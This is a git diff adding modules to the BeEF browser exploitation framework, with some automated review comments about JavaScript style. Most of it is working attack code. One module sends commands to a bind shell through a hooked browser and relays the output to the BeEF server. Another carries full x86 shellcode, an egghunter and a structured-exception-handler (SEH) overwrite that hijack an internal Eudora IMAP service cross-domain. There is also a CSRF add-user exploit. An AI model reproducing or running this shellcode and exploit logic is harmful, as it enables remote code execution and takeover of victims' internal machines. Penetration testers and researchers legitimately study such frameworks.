 	var base     = '<%= @base %>'; 
 	var username = '<%= @username %>';
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
index 4231dc7e8..7a15e558e 100644
--- a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
@@ -22,4 +12,4 @@ beef:
             description: "Attempts to add a user to an Axous <= 1.1.1 install (CVE-2012-2629)."
             authors: ["bcoles", "Ivano Binetti"]
             target:
-                working: ["ALL"]
+                unknown: ["ALL"]
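Review bot: The second hunk changes the module's target status from `working` to `unknown` with no explanation in the commit record, so a later maintainer cannot tell whether this reflects a failed re-test or a policy change. A short inline comment on that line would record the reason, e.g. `unknown: ["ALL"] # <reason for status change>`.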
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
index ba7f8e63e..ee3559091 100644
--- a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Axous_add_user_csrf < BeEF::Core::Command
 
diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js
new file mode 100755
index 000000000..afd6b8256
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/command.js
@@ -0,0 +1,91 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function () {
+    var rhost = '<%= @rhost %>';
+    var rport = '<%= @rport %>';
+    var path = '<%= @path %>';
+    var cmd = '<%= @cmd %>';
+    var shellcode ='<%= @shellcode %>';
+
+    var uri = "http://" + rhost + ":" + rport + path;
+
+    strip_output = function(output){
+
+        var offset = 0;
+        for(var c in output){
+            c = output.charAt(c);
+            if(c.charCodeAt(0) == 0){
+                break;
+            }
+            offset++;
+        }
+        return output.substring(0,offset);
+    };
+
+    var counter = 0;
+    get_additional_cmd_results = function(){
+        xhr = new XMLHttpRequest();
+        xhr.onreadystatechange = function(){
+            if(xhr.readyState == 4){
+                var result = strip_output(xhr.responseText);
+                beef.debug("result.length: " + result.length);
+                if(result.length != 0){
+                    beef.debug("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
+                    beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
+                        counter++;
+                        setTimeout("get_additional_cmd_results()",500);
+                        }
+             }else{ // No more command results, ready to send another command.
+                beef.debug("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
+            }
+        };
+        xhr.open("GET", uri, false);
+        xhr.send(null);
+    };
+
+    get_prompt = function () {
+
+        xhr = new XMLHttpRequest();
+        xhr.onreadystatechange = function(){
+            if(xhr.readyState == 4){
+                beef.debug("get_prompt: Retrieved prompt");
+                var prompt = strip_output(xhr.responseText);
+                beef.debug(prompt);
+                beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
+
+                //send command
+                send_command(cmd);
+            }
+        };
+        xhr.open("GET", uri, false);
+        xhr.send(null);
+    };
+
+    send_command = function(command){
+        xhr = new XMLHttpRequest();
+        xhr.onreadystatechange = function(){
+            var cmd_result = strip_output(xhr.responseText);
+            beef.debug(cmd_result);
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
+        };
+        xhr.open("POST", uri, false);
+        xhr.setRequestHeader("Content-Type", "text/plain");
+	if (shellcode == 'Linux'){
+            command = "cmd=" + command + "\n"; // very important only LF
+        }else{
+            command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+        }
+        xhr.send(command);
+        setTimeout("get_additional_cmd_results()",500);
+    };
+
+
+
+get_prompt();
+
+});
+
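Review bot: `strip_output`, `get_additional_cmd_results`, `get_prompt`, `send_command` and every `xhr` are assigned without `var`, so they are created as globals on the hooked page's `window` and the single shared `xhr` is overwritten by each call; declare them with `var` inside the `beef.execute` closure, e.g. `var strip_output = function(output){` and `var xhr = new XMLHttpRequest();`. `setTimeout("get_additional_cmd_results()",500)` passes a string, which the browser evaluates like `eval`; pass the function reference instead, `setTimeout(get_additional_cmd_results, 500);`, in both places it appears. `strip_output` iterates a string with `for (var c in output)`, which walks property names rather than characters; a plain index loop `for (var i = 0; i < output.length; i++)` expresses the intent directly.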
diff --git a/modules/exploits/beefbind/beef_bind_shell/config.yaml b/modules/exploits/beefbind/beef_bind_shell/config.yaml
new file mode 100755
index 000000000..e7de6238a
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        BeEF_bind_shell:
+            enable: true
+            category: ["Exploits", "BeEF_bind"]
+            name: "BeEF bind shell"
+            description: "Send commands to be executed on the already deployed BeEF_bind shellcode, and get results back."
+            authors: ["antisnatchor", "tymiller"] # shellcode awesomeness -> Ty Miller
+            target:
+                working: ["FF", "C", "S"]
diff --git a/modules/exploits/beefbind/beef_bind_shell/module.rb b/modules/exploits/beefbind/beef_bind_shell/module.rb
new file mode 100755
index 000000000..dc84c3c03
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/module.rb
@@ -0,0 +1,25 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Beef_bind_shell < BeEF::Core::Command
+
+	def self.options
+		return [
+      { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
+      { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
+      { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
+      { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'},
+      { 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore',
+          'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']],
+          'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true
+        }
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
new file mode 100755
index 000000000..22702db22
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
@@ -0,0 +1,388 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function () {
+    var rhost = '<%= @rhost %>';
+    var rport = '<%= @rport %>';
+    var service_port = '<%= @service_port %>';
+    var path = '<%= @path %>';
+    var delay = parseInt('<%= @delay %>');
+
+    var beef_host = '<%= @beef_host %>';
+    var beef_port = '<%= @beef_port %>';
+    var beef_proto = beef.net.httpproto;
+    var beef_junk_port = '<%= @beef_junk_port %>';
+    var sock_name = '<%= @beef_junk_socket %>';
+
+    //todo: this will be obviously dynamic as soon as we'll have more IPEC exploits.
+    var available_space = 769;
+
+    // base64 decode function that works properly with binary data (like shellcode)
+    var Base64Binary = {
+        _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+
+        decode:function (input) {
+            //get last chars to see if are valid
+            var lkey1 = this._keyStr.indexOf(input.charAt(input.length - 1));
+            var lkey2 = this._keyStr.indexOf(input.charAt(input.length - 1));
+
+            var bytes = Math.ceil((3 * input.length) / 4.0);
+            /**
+             if (lkey1 == 64) bytes--; //padding chars, so skip
+             if (lkey2 == 64) bytes--; //padding chars, so skip
+             **/
+
+            var uarray = [];
+            var chr1, chr2, chr3;
+            var enc1, enc2, enc3, enc4;
+            var i = 0;
+            var j = 0;
+
+            input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
+
+            for (i = 0; i < bytes; i += 3) {
+                //get the 3 octects in 4 ascii chars
+                enc1 = this._keyStr.indexOf(input.charAt(j++));
+                enc2 = this._keyStr.indexOf(input.charAt(j++));
+                enc3 = this._keyStr.indexOf(input.charAt(j++));
+                enc4 = this._keyStr.indexOf(input.charAt(j++));
+
+                chr1 = (enc1 << 2) | (enc2 >> 4);
+                chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+                chr3 = ((enc3 & 3) << 6) | enc4;
+
+                uarray.push(chr1 & 0xff);
+                if (enc3 != 64) uarray.push(chr2 & 0xff);
+                if (enc4 != 64) uarray.push(chr3 & 0xff);
+            }
+            return uarray;
+        }
+    };
+
+
+    /*
+     * Ty's goodness. Slightly modified BeEF bind stager to work with the
+     * Egg Hunter.
+     *
+     * Original size: 299 bytes
+     * Final size: 326 bytes
+     * BadChars removed: \x00\x0a\x0d\x20\x7b
+     */
+    var stager = "B33FB33F" + 
+        "\xba\x6a\x99\xf8\x25\xd9\xcc\xd9\x74\x24\xf4\x5e\x31\xc9" +
+        "\xb1\x4b\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x9f\x65" +
+        "\x10\xac\x5f\x96\xe1\xcf\xd6\x73\xd0\xdd\x8c\xf0\x41\xd2" +
+        "\xc7\x55\x6a\x99\x85\x4d\xf9\xef\x01\x61\x4a\x45\x77\x4c" +
+        "\x4b\x6b\xb7\x02\x8f\xed\x4b\x59\xdc\xcd\x72\x92\x11\x0f" +
+        "\xb3\xcf\xda\x5d\x6c\x9b\x49\x72\x19\xd9\x51\x73\xcd\x55" +
+        "\xe9\x0b\x68\xa9\x9e\xa1\x73\xfa\x0f\xbd\x3b\xe2\x24\x99" +
+        "\x9b\x13\xe8\xf9\xe7\x5a\x85\xca\x9c\x5c\x4f\x03\x5d\x6f" +
+        "\xaf\xc8\x60\x5f\x22\x10\xa5\x58\xdd\x67\xdd\x9a\x60\x70" +
+        "\x26\xe0\xbe\xf5\xba\x42\x34\xad\x1e\x72\x99\x28\xd5\x78" +
+        "\x56\x3e\xb1\x9c\x69\x93\xca\x99\xe2\x12\x1c\x28\xb0\x30" +
+        "\xb8\x70\x62\x58\x99\xdc\xc5\x65\xf9\xb9\xba\xc3\x72\x2b" +
+        "\xae\x72\xd9\x24\x03\x49\xe1\xb4\x0b\xda\x92\x86\x94\x70" +
+        "\x3c\xab\x5d\x5f\xbb\xcc\x77\x27\x53\x33\x78\x58\x7a\xf0" +
+        "\x2c\x08\x14\xd1\x4c\xc3\xe4\xde\x98\x44\xb4\x70\x73\x25" +
+        "\x64\x31\x23\xcd\x6e\xbe\x1c\xed\x91\x14\x35\xdf\xb6\xc4" +
+        "\x52\x22\x48\xfa\xfe\xab\xae\x96\xee\xfd\x79\x0f\xcd\xd9" +
+        "\xb2\xa8\x2e\x08\xef\x61\xb9\x04\xe6\xb6\xc6\x94\x2d\x95" +
+        "\x6b\x3c\xa5\x6e\x60\xf9\xd4\x70\xad\xa9\x81\xe7\x3b\x38" +
+        "\xe0\x96\x3c\x11\x41\x58\xd3\x9a\xb5\x33\x93\xc9\xe6\xa9" +
+        "\x13\x86\x50\x8a\x47\xb3\x9f\x07\xee\xfd\x35\xa8\xa2\x51" +
+        "\x9e\xc0\x46\x8b\xe8\x4e\xb8\xfe\xbf\x18\x80\x97\xb8\x8b" +
+        "\xf3\x4d\x47\x15\x6f\x03\x23\x57\x1b\xd8\xed\x4c\x16\x5d" +
+        "\x37\x96\x26\x84";
+
+    /*
+     * Ty's goodness. Original BeEF bind stage.
+     *
+     * Original size: 792 bytes
+     */
+    var stage_allow_origin =
+        "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28" +
+            "\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52" +
+            "\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
+            "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38" +
+            "\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58" +
+            "\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a" +
+            "\x8b\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5" +
+            "\x89\xc6\x68\x01\x00\x00\x00\x68\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68\x00\x00\x00\x00\x89" +
+            "\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c\x24\x0c\x57\x53\x51\x68\x3e\xcf" +
+            "\xaf\x0e\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00" +
+            "\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68\x00\x00\x00\x00" +
+            "\x68\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24\x04\x68\x00\x00\x00\x00\x68" +
+            "\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
+            "\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" +
+            "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79" +
+            "\xcc\x3f\x86\xff\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d" +
+            "\xbe\x18\x04\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20" +
+            "\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74\x2f" +
+            "\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c" +
+            "\x6c\x6f\x77\x2d\x4f\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" +
+            "\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x31\x36\x0d\x0a\x0d\x0a\x5e\xb9\x62\x00\x00\x00\xf3" +
+            "\xa4\x5e\x56\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90" +
+            "\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" +
+            "\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" +
+            "\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff" +
+            "\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00\x5e\x89\x3e\x6a\x00\x68\x00" +
+            "\x04\x00\x00\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
+            "\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb\xf2\x81\xc3" +
+            "\x03\x00\x00\x00\x43\x53\x68\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00\x57\x68\x01\x00\x00\x00" +
+            "\x53\x8b\x5c\x24\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00" +
+            "\x00\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24\x74\x8b" +
+            "\x1b\x53\x68\x18\xb7\x3c\xb3\xff\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0\x74\x3d\x68\x00\x00" +
+            "\x00\x00\x8d\xbe\x14\x04\x00\x00\x57\x68\x86\x0b\x00\x00\x8d\xbe\x7a\x04\x00\x00\x57\x8d\x5c" +
+            "\x24\x70\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18\x04" +
+            "\x00\x00\x57\xff\x36\x68\xc2\xeb\x38\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52\xff\xd5\xe9\x38" +
+            "\xfe\xff\xff";
+
+    // Skape's NtDisplayString egghunter technique, 32 bytes -> see also string T00W inside
+    /*
+     * Egg Hunter (Skape's NtDisplayString technique).
+     * Original size: 32 bytes
+     *
+     * Next SEH and SEH pointers
+     * Size: 8 bytes
+     */
+    var egg_hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +
+                     "\xef\xb8\x42\x33\x33\x46\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
+    var next_seh   = "\xeb\x06\x90\x90";
+    var seh        = "\x4e\x3b\x01\x10";
+
+
+    gen_nops = function(count){
+        var i = 0;
+        var result = "";
+        while(i < count ){ result += "\x90";i++;}
+        log("gen_nops: generated " + result.length + " nops.");
+        return result;
+    };
+
+    /*
+     * send_stager_back():
+     * In order to properly calculate the exact size of the cross-domain request headers,
+     * we send a bogus request back to BeEF (different port, so still cross-domain).
+     *
+     * get_junk_size():
+     * Then we retrieve the total size of the HTTP headers, as well as other specific headers like 'Host'
+     *
+     * calc_junk_size():
+     * Calculate the differences with the request that will be sent to the target, for example:
+     * "Host: 172.16.67.1:2000\r\n"    //24 bytes
+     * "Host: 172.16.67.135:143\r\n"   //25 bytes
+     */
+    send_stager_back = function(){
+        var uri = "http://" + beef_host + ":" + beef_junk_port + "/";
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", uri, true);
+        xhr.setRequestHeader("Content-Type", "text/plain");
+        xhr.setRequestHeader('Accept','*/*');
+        xhr.setRequestHeader("Accept-Language", "en");
+        xhr.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
+        log("send_stager_back: sending back the stager to calculate headers size");
+    };
+
+    var timeout_counter = 0;
+    var timeout = 10;
+    var size,host,contenttype,referer,nops = null;
+    get_junk_size = function(){
+        var junk_name = "";
+        var uri = beef_proto + "://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name;
+
+        $j.ajax({
+            type: "GET",
+            url: uri,
+            dataType: "json",
+            success: function(data, textStatus, xhr){
+                size = data.size;
+                host = data.host;
+                contenttype = data.contenttype;
+                referer = data.referer;
+
+                //todo to it better
+                nops = data.nops;
+
+                log("get_junk_size: OK - size [" + size + "] - host [" +
+                    host + "] - contenttype [" + contenttype + "] - referer [" + referer + "]");
+            },
+            error: function(jqXHR, textStatus, errorThrown){
+                timeout_counter++;
+                // re-tries for 10 times (10 seconds)
+                if (timeout_counter < timeout) {
+                    log("get_junk_size: ERROR - no data yet. re-trying.");
+                    setTimeout(function() {get_junk_size()},1000);
+                }else{
+                    log("get_junk_size: ERROR - timeout reached. giving up.");
+                }
+            }
+        });
+
+    };
+
+    var final_junk_size = null;
+    calc_junk_size = function(){
+
+        final_junk_size = size;
+        // 8 -> Host: \r\n
+        var new_host = (rhost+":"+service_port).length + 8;
+        if(new_host != host){
+
+            if(new_host > host){
+                var diff = new_host - host;
+                final_junk_size += diff;
+            }else{
+                var diff = host - new_host;
+                final_junk_size -= diff;
+            }
+        }
+        log("get_junk_size: final_junk_size -> [" + final_junk_size + "]");
+
+        //content-type "; charset=UTF-8" will not be present at the end, in the new request - we save 15 bytes
+        if(contenttype > 26)
+            final_junk_size -= 15;
+
+        // referrer should be the same
+        // we can also override the UserAgent (deliovering the Firefox Extension). We can then save 90 bytes or more.
+        log("get_junk_size: final_junk_size -> [" + final_junk_size + "]");
+    };
+
+    var stager_successfull = false;
+    send_stager = function(){
+
+        try{
+            xhr = new XMLHttpRequest();
+            var uri = "http://" + rhost + ":" + service_port + path;
+            log("send_stager: URI " + uri);
+            xhr.open("POST", uri, true);
+            xhr.setRequestHeader("Content-Type", "text/plain");
+
+            //todo: if for some reasons the headers are too big (bigger than 425 bytes),
+            // a warning should be displayed, because the exploit will not work, given the
+            // space for the shellcode that we have.
+            // The likelihood of this can be minimized thanks to the Firefox Extension we deliver
+            // to disable PortBanning. We are also overriding the UserAgent, so we save up to 100 bytes of space.
+
+            var junk = available_space - stager.length - final_junk_size; // 22 bytes
+            var junk_data = gen_nops(junk);
+
+            var payload = junk_data + stager + next_seh + seh + egg_hunter;
+            var decoded_payload = Base64Binary.decode(btoa(payload));
+
+            var c = "";
+            for (var i = 0; i < decoded_payload.length; i++) {
+                c += String.fromCharCode(decoded_payload[i] & 0xff);
+            }
+
+            //needed to have the service replying before sending the actual exploit
+            xhr.open("POST", uri, true);
+            xhr.setRequestHeader("Content-Type", "text/plain");
+            xhr.setRequestHeader('Accept','*/*');
+            xhr.setRequestHeader("Accept-Language", "en");
+            xhr.send("a001 LIST \r\n");
+            // / needed to have the service replying before sending the actual exploit
+
+            xhr.open("POST", uri, true);
+            xhr.setRequestHeader("Content-Type", "text/plain");
+            xhr.setRequestHeader('Accept','*/*');
+            xhr.setRequestHeader("Accept-Language", "en");
+
+            var post_body = "a001 LIST " + "}" + c + "}" + "\r\n";
+
+            log("send_stager: Final body length [" + post_body.length + "]");
+
+            // this is required only with WebKit browsers.
+            if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
+                beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+                XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
+                    function byteValue(x) {
+                        return x.charCodeAt(0) & 0xff;
+                    }
+                    var ords = Array.prototype.map.call(datastr, byteValue);
+                    var ui8a = new Uint8Array(ords);
+                    this.send(ui8a.buffer);
+                }
+            }
+
+            xhr.sendAsBinary(post_body);
+            log("send_stager: stager sent.");
+            stager_successfull = true;
+        }catch(exception){
+            beef.debug("!!! Exception: " + exception);
+            // Check for PortBanning exceptions:
+            //NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited
+            if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){
+                // not exactly needed but just in case
+                stager_successfull =  false;
+                log("Error: NS_ERROR_PORT_ACCESS_NOT_ALLOWED. Looks like PortBanning for port [" + service_port + "] is still enabled!");
+            }
+        }
+
+    };
+
+    deploy_stage = function () {
+        if(stager_successfull){
+            // As soon as the stage is running, the HTTP responses will contain Access-Control-Allow-Origin: *
+            // so we can communicate with CORS normally.
+            var decoded_shellcode = Base64Binary.decode(btoa(stage_allow_origin));
+            var c = "";
+            for (var i = 0; i < decoded_shellcode.length; i++) {
+                c += String.fromCharCode(decoded_shellcode[i] & 0xff);
+            }
+            var post_body = "cmd=" + c;
+            var uri = "http://" + rhost + ":" + rport + path;
+
+            xhr = new XMLHttpRequest();
+            beef.debug("uri: " + uri);
+            xhr.open("POST", uri, true);
+            xhr.setRequestHeader("Content-Type", "text/plain");
+
+            // this is required only with WebKit browsers.
+            if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
+                beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+                XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
+                    function byteValue(x) {
+                        return x.charCodeAt(0) & 0xff;
+                    }
+                    var ords = Array.prototype.map.call(datastr, byteValue);
+                    var ui8a = new Uint8Array(ords);
+                    this.send(ui8a.buffer);
+                }
+            }
+
+            xhr.sendAsBinary(post_body);
+            log("deploy_stage: stage sent.\r\n You should be now able to use beef_bind_shell module to send commands.");
+        }else{
+            log("Skipping Stage delivery because Stager failed.");
+        }
+
+    };
+
+    log = function(data){
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
+        beef.debug(data);
+    };
+
+
+/*
+* To calculate exact HTTP header size we send a request back to BeEF, on a different socket, to maintain
+* the cross-domain behavior.
+*/
+send_stager_back();
+
+/*
+* Deliver Stager and Stage.
+*
+* The following timeouts should be enough with normal DSL lines.
+* Increase delay value for slower clients.
+*/
+setTimeout("get_junk_size()", delay/2);
+setTimeout("calc_junk_size()", delay);
+setTimeout("send_stager()", 2000 + delay);
+setTimeout("deploy_stage()", 6000 + delay);
+
+});
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
new file mode 100755
index 000000000..02b3c6e20
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        BeEF_bind_staged_deploy:
+            enable: true
+            category: ["Exploits", "BeEF_bind"]
+            name: "BeEF bind"
+            description: "Pwn internal services with a custom staging shellcode. Both the stager and the stage are delivered.
Right now only Eudora Mail 3 (v. v6.1.19.0) on Windows (POP ECX mailcmn.dll) can be exploited: SEH exploit with EggHunter.
More exploits to come soon."
+ authors: ["antisnatchor", "tymiller"] # shellcode awesomeness -> Ty Miller
+ target:
+ working: ["FF"]
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
new file mode 100755
index 000000000..bd3a9aacd
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Beef_bind_staged_deploy < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ beef_host = "#{configuration.get("beef.http.host")}"
+ beef_port = "#{configuration.get("beef.http.port")}"
+
+ return [
+ { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},
+ { 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '143'},
+ { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
+ { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
+ { 'name' => 'delay', 'ui_label' => 'Add delay (ms)', 'value' => '4000'},
+ { 'name' => 'beef_host', 'ui_label' => 'BeEF Host', 'value' => beef_host},
+ { 'name' => 'beef_port', 'ui_label' => 'BeEF Port', 'value' => beef_port},
+ { 'name' => 'beef_junk_port', 'ui_label' => 'BeEF Junk Port', 'value' => '2000'},
+ { 'name' => 'beef_junk_socket', 'ui_label' => 'BeEF Junk Socket Name', 'value' => 'imapeudora1'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
